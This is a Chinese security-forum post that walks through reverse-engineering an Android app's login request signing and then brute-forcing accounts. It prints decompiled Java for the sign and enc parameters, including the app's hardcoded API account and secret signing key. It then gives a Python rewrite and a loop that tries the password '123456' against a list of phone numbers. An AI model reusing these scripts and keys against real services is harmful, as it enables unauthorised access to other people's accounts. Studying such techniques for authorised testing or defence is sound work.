首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 企业安全
    3. 发新帖
[原创] 记一次APP登录爆破
2022-8-10 11:30 7693

[原创] 记一次APP登录爆破

雷石实验室 活跃值
2022-8-10 11:30
7693

记一次APP登录爆破

使用工具

  1. 安卓12
  2. jadx-gui

抓取登录HTTP请求包

  1. 安装burp证书,并抓取登录请求。
1
2
3
4
POST /loginUser HTTP/1.1
Host: api.xxxx.xxxxx.com
 
apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&phone=xxxx&sign=72C132B392873B3F4F6C0872E5EC4B5A&enc=M%2F8hR0rN%2B0KwSGZ59%2FGQqWbrUgTAMZW%2FPnv2tiKlMjGmy%2Fmtu7tXSEftEkTLOoczSXH8%3D&timestamp=1658332134014
  1. 分析登录请求包中需要五个参数
    1. apiaccount
    2. sign
    3. enc
    4. phone
    5. timestamp

分析参数

apiaccount

搜索关键词

 

 

此关键词为固定值vrpuc-aaf91f835147ce2d01216bd3bd5c3516

phone

手机号

timestamp

  1. 此值为当前的时间戳String.valueOf(System.currentTimeMillis())

  2. 改写为python代码

1
2
import time
timestamp = str(int(time.time()*1000))

sign

 

 

 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
public static O d(String str, String str2) {
    HashMap hashMap = new HashMap();
    hashMap.put("phone", str);
    hashMap.put("enc", e(str2));
    return c.g.b.f.b.c(f.h(), a(hashMap));
}
 
private static Map<String, String> a(Map<String, String> map) {
    HashMap hashMap = new HashMap();
    hashMap.put("apiaccount", "vrpuc-aaf91f835147ce2d01216bd3bd5c3516");
    hashMap.put("timestamp", String.valueOf(System.currentTimeMillis()));
    TreeMap treeMap = new TreeMap();
    treeMap.putAll(hashMap);
    if (map != null) {
        treeMap.putAll(map);
    }
    hashMap.put("sign", a((SortedMap<String, String>) treeMap));
    if (map != null) {
        hashMap.putAll(map);
    }
    return hashMap;
}
 
private static String a(SortedMap<String, String> sortedMap) {
    StringBuffer stringBuffer = new StringBuffer();
    for (Map.Entry<String, String> entry : sortedMap.entrySet()) {
        if (!TextUtils.isEmpty(entry.getValue())) {
            stringBuffer.append(entry.getKey() + "=" + entry.getValue() + "&");
        }
    }
    stringBuffer.append("key=a0f723c011346j39w049d7bf0356b34b");
    return D.d(stringBuffer.toString()).toUpperCase();
}
private static byte[] a(byte[] bArr, String str) {
    if (bArr != null && bArr.length > 0) {
        try {
            MessageDigest messageDigest = MessageDigest.getInstance(str);
            messageDigest.update(bArr);
            return messageDigest.digest();
        } catch (NoSuchAlgorithmException e2) {
            e2.printStackTrace();
        }
    }
    return null;
}
 
private static String q(byte[] bArr) {
    int length;
    if (bArr != null && (length = bArr.length) > 0) {
        char[] cArr = new char[length << 1];
        int i2 = 0;
        for (int i3 = 0; i3 < length; i3++) {
            int i4 = i2 + 1;
            char[] cArr2 = f10685a;
            cArr[i2] = cArr2[(bArr[i3] >> 4) & 15];
            i2 = i4 + 1;
            cArr[i4] = cArr2[bArr[i3] & 15];
        }
        return new String(cArr);
    }
    return "";
}

sign参数组合

1
sign_ori = 'apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&enc=' + enc + '&phone=xxxxxx&timestamp=' + tmtp + '&key=a0f723c011346j39w049d7bf0356b34b'

enc

str = phone str2 = password

 

 

 

 

 

 

 

 

 

 

大致流程

  1. 输入密码
  2. 密码 + 随机10位salt
    1. "password=" + "密码" + "&salt=" + salt
  3. 使用此函数操作密钥
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
private static byte[] b(String str) throws UnsupportedEncodingException {
    int i2;
    byte b2;
    int i3;
    byte b3;
    int i4;
    byte b4;
    int i5;
    byte b5;
    StringBuffer stringBuffer = new StringBuffer();
    byte[] bytes = str.getBytes("US-ASCII");
    int length = bytes.length;
    int i6 = 0;
    while (i6 < length) {
        while (true) {
            i2 = i6 + 1;
            b2 = f16023b[bytes[i6]];
            if (i2 >= length || b2 != -1) {
                break;
            }
            i6 = i2;
        }
        if (b2 == -1) {
            break;
        }
        while (true) {
            i3 = i2 + 1;
            b3 = f16023b[bytes[i2]];
            if (i3 >= length || b3 != -1) {
                break;
            }
            i2 = i3;
        }
        if (b3 == -1) {
            break;
        }
        stringBuffer.append((char) ((b2 << 2) | ((b3 & 48) >>> 4)));
        while (true) {
            i4 = i3 + 1;
            byte b6 = bytes[i3];
            if (b6 == 61) {
                return stringBuffer.toString().getBytes("iso8859-1");
            }
            b4 = f16023b[b6];
            if (i4 >= length || b4 != -1) {
                break;
            }
            i3 = i4;
        }
        if (b4 == -1) {
            break;
        }
        stringBuffer.append((char) (((b3 & 15) << 4) | ((b4 & 60) >>> 2)));
        while (true) {
            i5 = i4 + 1;
            byte b7 = bytes[i4];
            if (b7 == 61) {
                return stringBuffer.toString().getBytes("iso8859-1");
            }
            b5 = f16023b[b7];
            if (i5 >= length || b5 != -1) {
                break;
            }
            i4 = i5;
        }
        if (b5 == -1) {
            break;
        }
        stringBuffer.append((char) (b5 | ((b4 & 3) << 6)));
        i6 = i5;
    }
    return stringBuffer.toString().getBytes("iso8859-1");
}
  1. RSA加密
1
2
3
Cipher cipher = Cipher.getInstance("RSA");
cipher.init(1, publicKey);
return cipher.doFinal(bArr);
  1. 使用此函数处理加密后的结果
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
public static String a(byte[] bArr) {
    StringBuffer stringBuffer = new StringBuffer();
    int length = bArr.length;
    int i2 = 0;
    while (true) {
        if (i2 >= length) {
            break;
        }
        int i3 = i2 + 1;
        int i4 = bArr[i2] & 255;
        if (i3 == length) {
            stringBuffer.append(f16022a[i4 >>> 2]);
            stringBuffer.append(f16022a[(i4 & 3) << 4]);
            stringBuffer.append("==");
            break;
        }
        int i5 = i3 + 1;
        int i6 = bArr[i3] & 255;
        if (i5 == length) {
            stringBuffer.append(f16022a[i4 >>> 2]);
            stringBuffer.append(f16022a[((i4 & 3) << 4) | ((i6 & PsExtractor.VIDEO_STREAM_MASK) >>> 4)]);
            stringBuffer.append(f16022a[(i6 & 15) << 2]);
            stringBuffer.append("=");
            break;
        }
        int i7 = i5 + 1;
        int i8 = bArr[i5] & 255;
        stringBuffer.append(f16022a[i4 >>> 2]);
        stringBuffer.append(f16022a[((i4 & 3) << 4) | ((i6 & PsExtractor.VIDEO_STREAM_MASK) >>> 4)]);
        stringBuffer.append(f16022a[((i6 & 15) << 2) | ((i8 & 192) >>> 6)]);
        stringBuffer.append(f16022a[i8 & 63]);
        i2 = i7;
    }
    return stringBuffer.toString();
}

改写为python代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def main(phone,password):
    url = "https://xx.com/loginUser"
    sign = ""
    enc = ""
    tmtp = str(int(time.time() * 1000))
 
    salt = "1234567890"  # 随机生成的10个数字
    enc_ori = "password=" + password + "&salt=" + salt
    enc = gen_enc(enc_ori)
 
    sign_ori = 'apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&enc=' + enc + '&phone=' + phone+'&timestamp=' + tmtp + '&key=a0f723c011346j39w049d7bf0356b34b'
 
    sign = gen_sign(sign_ori)
    print(quote_plus(enc))
 
    data = "apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&phone="+phone+"&sign=" + sign + "&enc=" + quote_plus(enc) + "&timestamp=" + tmtp
 
    res = requests.post(url=url, data=data)
    print(res.text)

加载字典爆破

1
2
3
4
5
6
7
8
9
def main(phone, password):
    res = requests.post(url=url, headers=headers, data=data)
    print(res.text)
 
 
if __name__ == "__main__":
    with open("phone","r") as f:
        for i in f.readlines():
            main(i.strip(),"123456")

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回